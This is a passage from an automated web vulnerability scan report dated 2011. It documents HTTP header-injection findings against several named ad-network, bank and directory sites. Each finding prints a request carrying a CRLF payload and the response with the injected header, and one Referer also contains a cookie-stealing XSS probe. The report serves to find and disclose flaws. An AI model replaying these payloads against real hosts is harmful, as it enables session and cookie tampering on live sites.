FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:aabf4
30b9c2776ab
;expires=Fri, 04 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=132
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:52 GMT
Connection: close
Content-Length: 2491

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',aabf4

...[SNIP]...

1.52. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload ca6b6%0d%0ab451cec5ae0 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=ca6b6%0d%0ab451cec5ae0&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:ca6b6
b451cec5ae0
;expires=Fri, 04 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2492

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',ca6b6

...[SNIP]...

1.53. https://customercare.suntrust.com/guides/bus_services.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/bus_services.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 63309%0d%0a7cae529033e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /63309%0d%0a7cae529033e/bus_services.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 13:40:25 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/63309
7cae529033e
/bus_services.asp


1.54. https://customercare.suntrust.com/guides/contact_us.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/contact_us.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ac2d3%0d%0ac45a5b7ea59 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ac2d3%0d%0ac45a5b7ea59/contact_us.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 13:40:18 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/ac2d3
c45a5b7ea59
/contact_us.asp


1.55. https://customercare.suntrust.com/guides/credit_cards.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/credit_cards.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c1afa%0d%0ab3b66e981f0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c1afa%0d%0ab3b66e981f0/credit_cards.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 14:22:06 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/c1afa
b3b66e981f0
/credit_cards.asp


1.56. https://customercare.suntrust.com/guides/deposits.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/deposits.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b116f%0d%0a7994da7a583 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b116f%0d%0a7994da7a583/deposits.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 14:22:05 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/b116f
7994da7a583
/deposits.asp


1.57. https://customercare.suntrust.com/guides/marine_lending.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/marine_lending.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c2767%0d%0aa8e07e5183f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c2767%0d%0aa8e07e5183f/marine_lending.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 14:22:07 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/c2767
a8e07e5183f
/marine_lending.asp


1.58. https://customercare.suntrust.com/guides/merchant_services.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/merchant_services.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a3d1%0d%0a704833da91d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4a3d1%0d%0a704833da91d/merchant_services.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 14:22:02 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/4a3d1
704833da91d
/merchant_services.asp


1.59. https://customercare.suntrust.com/guides/mort_services.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/mort_services.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9cb1a%0d%0a923c4ef6e41 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9cb1a%0d%0a923c4ef6e41/mort_services.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 14:22:09 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/9cb1a
923c4ef6e41
/mort_services.asp


1.60. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 97dc5%0d%0ad5802bb2bc3 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=PFZ&si=18182&pi=H&xs=1&pu=http%253A//pbid.pro-market.net/engine%253Fsite%253D111778%253Bsize%253D1x1%253Bcategory%253D%253Bkw%253Dbanks%2526ifu%253Dhttp%25253A//www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/%2526cmmiss%253D-1%2526cmkw%253D&v=5.5&cb=4323 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://pbid.pro-market.net/engine?site=111778;size=1x1;category=;kw=banks
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; ANRTT=50213^1^1296913131|50212^1^1296760157|50220^1^1297353628; Tsid=0^1296748802^1296750628|18182^1296748802^1296750628; TData=99999|^|50012|51133|51184|52611|52615|52947|53575|54490|54898|54938|54954|56432|56555|56732|56733|56780|60425|60488|60490|60491|60506|60739|61674|#|50213|50212|50220; Anxd=x; N=2:22cab0f9b4ce99c1d3dd43221ef0019f,22cab0f9b4ce99c1d3dd43221ef0019f97dc5%0d%0ad5802bb2bc3; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMTI6NTAyMjA=

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:04:36 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 03 Feb 2011 16:19:36 GMT
Set-Cookie: ANRTT=50213^1^1296913131|50212^1^1296760157|50220^1^1297353876; path=/; expires=Thu, 10-Feb-11 16:04:36 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1296748802^1296750876|18182^1296748802^1296750876; path=/; expires=Thu, 03-Feb-11 16:34:36 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50012|51133|51184|52611|52615|52947|53575|54490|54898|54938|54954|56432|56555|56732|56733|56780|60425|60488|60490|60491|60506|60739|61674|#|50213|50212|50220; expires=Sun, 29-Jan-12 16:04:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Thu, 03-Feb-11 22:04:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:22cab0f9b4ce99c1d3dd43221ef0019f97dc5
d5802bb2bc3
,22cab0f9b4ce99c1d3dd43221ef0019f; expires=Sun, 29-Jan-12 16:04:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMTI6NTAyMjA=; expires=Sun, 29-Jan-12 16:04:36 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 260
Content-Type: application/x-javascript
Content-Length: 260

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50012|51133|51184|52611|52615|52947|53575|54490|54898|54938|54954|56432|56555|56732|56733|56780|60425|60488|60490|
...[SNIP]...

1.61. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload e86db%0d%0a2247350a294 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=PFZ&si=e86db%0d%0a2247350a294&pi=H&xs=1&pu=http%253A//pbid.pro-market.net/engine%253Fsite%253D111778%253Bsize%253D1x1%253Bcategory%253D%253Bkw%253Dbanks%2526ifu%253Dhttp%25253A//www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/%2526cmmiss%253D-1%2526cmkw%253D&v=5.5&cb=4323 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://pbid.pro-market.net/engine?site=111778;size=1x1;category=;kw=banks
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; ANRTT=50213^1^1296913131|50212^1^1296760157|50220^1^1297353628; Tsid=0^1296748802^1296750628|18182^1296748802^1296750628; TData=99999|^|50012|51133|51184|52611|52615|52947|53575|54490|54898|54938|54954|56432|56555|56732|56733|56780|60425|60488|60490|60491|60506|60739|61674|#|50213|50212|50220; Anxd=x; N=2:22cab0f9b4ce99c1d3dd43221ef0019f,22cab0f9b4ce99c1d3dd43221ef0019f; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMTI6NTAyMjA=

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:03:36 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 03 Feb 2011 16:18:36 GMT
Set-Cookie: ANRTT=50213^1^1296913131|50212^1^1296760157|50220^1^1297353816; path=/; expires=Thu, 10-Feb-11 16:03:36 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1296748802^1296750816|18182^1296748802^1296750628|e86db
2247350a294
^1296749016^1296750816; path=/; expires=Thu, 03-Feb-11 16:33:36 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50012|51133|51184|52611|52615|52947|53575|54490|54898|54938|54954|56432|56555|56732|56733|56780|60425|60488|60490|60491|60506|60739|61674|#|50213|50212|50220; expires=Sun, 29-Jan-12 16:03:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Thu, 03-Feb-11 22:03:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:22cab0f9b4ce99c1d3dd43221ef0019f,22cab0f9b4ce99c1d3dd43221ef0019f; expires=Sun, 29-Jan-12 16:03:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMTI6NTAyMjA=; expires=Sun, 29-Jan-12 16:03:36 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 92
Content-Type: application/x-javascript
Content-Length: 92

var ANUT=1;
var ANOO=0;
var ANSR=0;
var ANTID='16if17a0kq0bgd';
var ANSL;
ANRTXR();


1.62. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the &tsrc request parameter is copied into the Set-Cookie response header. The payload 68d81%0d%0a4d208d5e6db was submitted in the &tsrc parameter. This caused a response containing an injected HTTP header.

Request

GET /business-listings/business-profile?&tsrc=68d81%0d%0a4d208d5e6db&campaignId=BP:Update+Your+Profile+Top HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:35 GMT
Set-Cookie: JSESSIONID=45AE3CAD75B7C29FEEE090D42CF18AE6.app8-a1; Path=/
Set-Cookie: trafficSource="68d81
4d208d5e6db
"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...

1.63. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 3e3db%0d%0ab735c4f3a4c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /spportal/spportalFlow.do3e3db%0d%0ab735c4f3a4c?fromPage=login&_flowId=loginact-flow HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/business-listings/business-profile?&tsrc=SP198c8%22%3balert(document.cookie)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Thu, 03 Feb 2011 19:12:37 GMT
Location: https://www.supermedia.com/spportal/spportalFlow.do3e3db
b735c4f3a4c
?fromPage=login&_flowId=loginact-flow
Content-Length: 0
Connection: close


Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:37:09 CST 2011.